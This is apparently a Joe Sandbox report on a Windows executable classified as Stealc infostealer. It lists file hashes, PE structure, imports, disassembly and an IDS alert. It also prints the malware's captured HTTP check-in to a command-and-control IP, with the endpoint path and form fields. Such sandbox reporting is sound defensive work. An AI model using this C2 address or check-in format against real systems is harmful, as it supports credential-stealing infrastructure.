      IPDomainCountryFlagASNASN NameMalicious
      91.206.178.118
      unknownPoland
      200088ARTNET2PLtrue
      Joe Sandbox version:39.0.0 Ruby
      Analysis ID:1386666
      Start date and time:2024-02-05 10:46:10 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 2m 20s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:3
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:mrkjKujfkP.exe
      renamed because original name is a hash value
      Original Sample Name:ec37b9184eb3457fff8057affeb6ffd5.exe
      Detection:MAL
      Classification:mal92.troj.evad.winEXE@2/0@0/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 93%
      • Number of executed functions: 18
      • Number of non-executed functions: 59
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Stop behavior analysis, all processes terminated
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtQueryValueKey calls found.
      No simulations
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      91.206.178.118vR19oQpY8c.exeGet hashmaliciousStealcBrowse
      • 91.206.178.118/a9d06ea3fe859ab7/vcruntime140.dll
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ARTNET2PLvR19oQpY8c.exeGet hashmaliciousStealcBrowse
      • 91.206.178.118
      sql.tmp.dll.dllGet hashmaliciousUnknownBrowse
      • 91.206.178.125
      UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
      • 185.104.112.62
      http://tldbonak.comGet hashmaliciousUnknownBrowse
      • 91.206.178.97
      7ECHtNYRdu.exeGet hashmaliciousVidarBrowse
      • 185.104.114.24
      Wi50Ux1Ats.exeGet hashmaliciousVidarBrowse
      • 185.104.114.24
      Divergencias.exeGet hashmaliciousMaxtrilhaBrowse
      • 185.104.113.156
      Divergencias.exeGet hashmaliciousMaxtrilhaBrowse
      • 185.104.113.156
      arm7.lightGet hashmaliciousMiraiBrowse
      • 185.104.117.9
      No context
      No context
      No created / dropped files found
      File type:PE32 executable (console) Intel 80386, for MS Windows
      Entropy (8bit):6.888097857945214
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:mrkjKujfkP.exe
      File size:310'272 bytes
      MD5:ec37b9184eb3457fff8057affeb6ffd5
      SHA1:4c9c17d1874a44e9708976736620b75d033274de
      SHA256:152e23b6a0f48147c40ceef6fb08f9702ff4da2fee7fbea4afe5c7c6b2cd35b0
      SHA512:7506a0ce7484331833399aecec9741736ed03787f938b44641f42999684fa3c02a6bc21ec30c5c11e5fd7276e89430cad9d383cc4be6ea9cc0a469323d39b790
      SSDEEP:6144:tUMOLNJ5l10oVJ4C3CO2uWGcTATRsYQiANCpUxEJKWc+T5omu7Uk9NTeeqKuje/K:mxLt0K4C3CO2uWGcTATRsYQiANCpUsKw
      TLSH:B6646B20A6E4B561C003F4334F7DE9EFA73A6512A7166DFA09C607B0BED1E986B35704
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<j..o..A/..$.......u.*.uv.}.....t0...S...LHO~ ..QP.dl`G......<%e%.I. ..Q#....*b.....%...z.v..:a&.....N\.................PE..L..
      Icon Hash:00928e8e8686b000
      Entrypoint:0x404318
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Time Stamp:0x65C0A2A6 [Mon Feb 5 08:56:06 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:6
      OS Version Minor:0
      File Version Major:6
      File Version Minor:0
      Subsystem Version Major:6
      Subsystem Version Minor:0
      Import Hash:382a4d7b99200ee7e9686d1f1cde0258
      Instruction
      call 00007FAC6106A3BAh
      jmp 00007FAC61069F39h
      and dword ptr [ecx+04h], 00000000h
      mov eax, ecx
      and dword ptr [ecx+08h], 00000000h
      mov dword ptr [ecx+04h], 00445360h
      mov dword ptr [ecx], 00445308h
      ret
      push ebp
      mov ebp, esp
      sub esp, 0Ch
      lea ecx, dword ptr [ebp-0Ch]
      call 00007FAC6106A09Fh
      push 0044A74Ch
      lea eax, dword ptr [ebp-0Ch]
      push eax
      call 00007FAC6106B189h
      int3
      push ebp
      mov ebp, esp
      sub esp, 0Ch
      lea ecx, dword ptr [ebp-0Ch]
      call 00007FAC61069570h
      push 0044A66Ch
      lea eax, dword ptr [ebp-0Ch]
      push eax
      call 00007FAC6106B16Ch
      int3
      push ebp
      mov ebp, esp
      mov eax, dword ptr [ebp+08h]
      push esi
      mov ecx, dword ptr [eax+3Ch]
      add ecx, eax
      movzx eax, word ptr [ecx+14h]
      lea edx, dword ptr [ecx+18h]
      add edx, eax
      movzx eax, word ptr [ecx+06h]
      imul esi, eax, 28h
      add esi, edx
      cmp edx, esi
      je 00007FAC6106A0DBh
      mov ecx, dword ptr [ebp+0Ch]
      cmp ecx, dword ptr [edx+0Ch]
      jc 00007FAC6106A0CCh
      mov eax, dword ptr [edx+08h]
      add eax, dword ptr [edx+0Ch]
      cmp ecx, eax
      jc 00007FAC6106A0CEh
      add edx, 28h
      cmp edx, esi
      jne 00007FAC6106A0ACh
      xor eax, eax
      pop esi
      pop ebp
      ret
      mov eax, edx
      jmp 00007FAC6106A0BBh
      push esi
      call 00007FAC6106A820h
      test eax, eax
      je 00007FAC6106A0E2h
      mov eax, dword ptr fs:[00000018h]
      mov esi, 0044CA30h
      mov edx, dword ptr [eax+04h]
      jmp 00007FAC6106A0C6h
      cmp edx, eax
      je 00007FAC6106A0D2h
      xor eax, eax
      mov ecx, edx
      lock cmpxchg dword ptr [esi], ecx
      test eax, eax
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x4ad240x28.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000x1030.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x49fb00x1c.rdata
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x49ef00x40.rdata
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x120000x130.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000xffd30x10000fb89902177544741f273b78d49fd5c1dFalse0.605316162109375data6.610824596118242IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .1eKI80x110000x54b0x6000f20743dbc3ff418db3d78aaf005bb6fFalse0.7135416666666666data5.410549386593947IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata0x120000x393e20x3940094acc79cda5eb42e4316a6ee370b8313False0.4073672898471616data6.59184787735665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0x4c0000x146c0xc00fe5e59a519c227296e1ac96c8f8255caFalse0.16243489583333334data2.1644385139883653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .reloc0x4e0000x10300x12003af010183f1a572cf86319934d76d1a5False0.7098524305555556data6.223006267344559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      DLLImport
      KERNEL32.dllVirtualProtect, GetModuleHandleA, GetProcAddress, VirtualAlloc, LoadLibraryA, lstrlenW, CreateThread, Sleep, WaitForSingleObject, FreeConsole, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, WriteConsoleW, RaiseException, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetFileType, GetStringTypeW, CompareStringW, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer
      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      192.168.2.591.206.178.11849705802044243 02/05/24-10:47:04.601026TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4970580192.168.2.591.206.178.118
      TimestampSource PortDest PortSource IPDest IP
      Feb 5, 2024 10:47:04.376053095 CET4970580192.168.2.591.206.178.118
      Feb 5, 2024 10:47:04.599847078 CET804970591.206.178.118192.168.2.5
      Feb 5, 2024 10:47:04.599977970 CET4970580192.168.2.591.206.178.118
      Feb 5, 2024 10:47:04.601026058 CET4970580192.168.2.591.206.178.118
      Feb 5, 2024 10:47:04.824857950 CET804970591.206.178.118192.168.2.5
      Feb 5, 2024 10:47:04.829705000 CET804970591.206.178.118192.168.2.5
      Feb 5, 2024 10:47:04.829773903 CET4970580192.168.2.591.206.178.118
      Feb 5, 2024 10:47:06.493103027 CET4970580192.168.2.591.206.178.118
      • 91.206.178.118
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.54970591.206.178.118802148C:\Users\user\Desktop\mrkjKujfkP.exe
      TimestampBytes transferredDirectionData
      Feb 5, 2024 10:47:04.601026058 CET410OUTPOST /31b57f88e9b186cd.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ
      Host: 91.206.178.118
      Content-Length: 209
      Connection: Keep-Alive
      Cache-Control: no-cache
      Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 46 44 34 39 46 45 37 32 39 39 31 33 31 32 36 34 37 36 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 45 55 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 2d 2d 0d 0a
      Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="hwid"90FD49FE72991312647697------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="build"EU------EGCFIDAFBFBAKFHJEGIJ--
      Feb 5, 2024 10:47:04.829705000 CET178INHTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Mon, 05 Feb 2024 09:47:04 GMT
      Content-Type: text/html; charset=UTF-8
      Content-Length: 8
      Connection: keep-alive
      Data Raw: 59 6d 78 76 59 32 73 3d
      Data Ascii: YmxvY2s=


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:10:47:02
      Start date:05/02/2024
      Path:C:\Users\user\Desktop\mrkjKujfkP.exe
      Wow64 process (32bit):true
      Commandline:C:\Users\user\Desktop\mrkjKujfkP.exe
      Imagebase:0xcc0000
      File size:310'272 bytes
      MD5 hash:EC37B9184EB3457FFF8057AFFEB6FFD5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      Reputation:low
      Has exited:true

      Target ID:1
      Start time:10:47:03
      Start date:05/02/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Reset < >